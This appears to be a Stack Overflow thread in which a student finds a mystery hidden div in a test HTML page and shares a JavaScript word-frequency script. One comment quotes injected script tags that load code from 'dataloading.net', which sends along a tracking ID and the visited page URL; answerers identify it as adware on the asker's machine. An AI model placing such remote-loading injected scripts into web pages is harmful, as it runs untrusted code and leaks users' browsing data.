# Unexpected hidden div appears in html file

Tags: javascript, html, web

I have been trying to search this, but haven't even found anyone with the same problem.

For my assignment, I had to write a javascript code that would read all the text from the external page (from the same directory though), but that's not the problem. The problem appeared when I have created a test html file with some random text.

**HTML Code**

```
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>test</title>
</head>
<body>    
    <p> Just a random text.</p>
    <h1> More of a random text</h1>
    <p> And again, just testing the program.</p>    
</body>
</html>
```

And this code is taken from the debugger:

[Image of html file as from Inspector](https://i.stack.imgur.com/OgZIr.png)

The problem is my `javascript code` does read the text from this `div` element and append the array of words that i have.

Does anyone know why is this div generated and how to get rid of it ?

P.S I have tried creating other html files, but div appears there too.

Thanks in **advance!**

EDIT:

That's my JS code:

```
var externalPage;
var words = [];
var j = 0;

function indexOf(array, item) {
    for (var i = 0; i < array.length; i++) {

        if (array[i][0].toString() === item.toString()) return i;
    }
    return -1;
}

function clearNode(node) {

    while (node.firstChild) {
        node.removeChild(node.firstChild);
    }
}

function sortNumerically(words) {

return words.sort(function(a,b){
    return b[1] - a[1];
});

}

function sortAlphabetically(words) {

    return words.sort();
}


function openFile(url) {

    externalPage = window.open();
    externalPage.location = url;

}

function extractWords(node) {

    if (node.nodeType==Node.ELEMENT_NODE) {
        for (var m = node.firstChild; m!=null; m = m.nextSibling)
            extractWords(m);
    }
    else {

        var value = node.nodeValue.trim();
        value = value.split(/\s/);
        for(var i = 0; i < value.length; i++) {

            if(indexOf(words, value[i]) != -1) {

                words[indexOf(words, value[i])][1] =
                    words[indexOf(words, value[i])][1] + 1;

            } else if(value[i] != '') {

                words.push([]);
                words[j][0] = value[i];
                words[j][1] = 1;

                j++;
            }
        }
    }
}

function populateTable(arr) {

    var tbody = document.createElement('tbody');

    clearNode(tbody);

    for(var i = 0; i< words.length; i++) {

        var tr = document.createElement('tr');

        var tdW = document.createElement('td');
        var tdF = document.createElement('td');

        tdW.appendChild(document.createTextNode(arr[i][0]));
        tdF.appendChild(document.createTextNode(arr[i][1]));

        tr.appendChild(tdW);
        tr.appendChild(tdF);

        tbody.appendChild(tr);

    }

    document.getElementById('tableCounter').appendChild(tbody);

}

function generateArray(node) {

    words = [];
    j = 0;
    extractWords(node, words);
    alert(sortNumerically(words));

    populateTable(words);

}
```

Comment: Can you please add your Javascript.

Comment: Hard to believe, since I didn't work with div elements at all.

Comment: Which plugins do you use ? Can you show us the head-tag of your html from the screenshot?

Comment: Header:

<head>
    <meta charset="UTF-8">
    <title>test</title>
<script type="text/javascript" src="https://dataloading.net/j/ijs?id=95561D9A-955E-58A2-8E23-A01EA4E2A1D9&amp;d=3168a8ab-1bcf-41ba-a65d-762b1336fdca&amp;cl=upd"></script>
<script src="https://code.jquery.com/jquery-3.1.0.min.js"></script>
<script src="https://dataloading.net/j/cjs?id=95561D9A-955E-58A2-8E23-A01EA4E2A1D9&amp;d=3168a8ab-1bcf-41ba-a65d-762b1336fdca&amp;cl=upd&amp;u=http%3A%2F%2Flocalhost%3A63342%2FCE212%2520WEB%2520Assignment%25201%2Ftest.html%3F_ijt%3Di7ephbjbmnrd2vrbhc21r8i7ll"></script>
</head>

Comment: Okey, you have kind of a virus on your PC.

Comment: The page "dataloading.net" is a virus, that add this div. Search for the page in google or somewhere you want.

Comment: I see. That explains everything. I have just checked other websites. In about 50% of all websites I have this hidden div.
Thanks for help!

Comment: @OlegNalivajev may mark my answer as correct, so everybody else will know, whats going on.

Answer (score 3, accepted):

This hidden box is an effect of a virus. The page `dataloading.net` is know as a virus page. You can search for it with your favourite search-module (google, bing, ...).

Answer (score 0):

As attached code snap that DIV definitely come from JS or any JS plugin which simply append to body with generated code.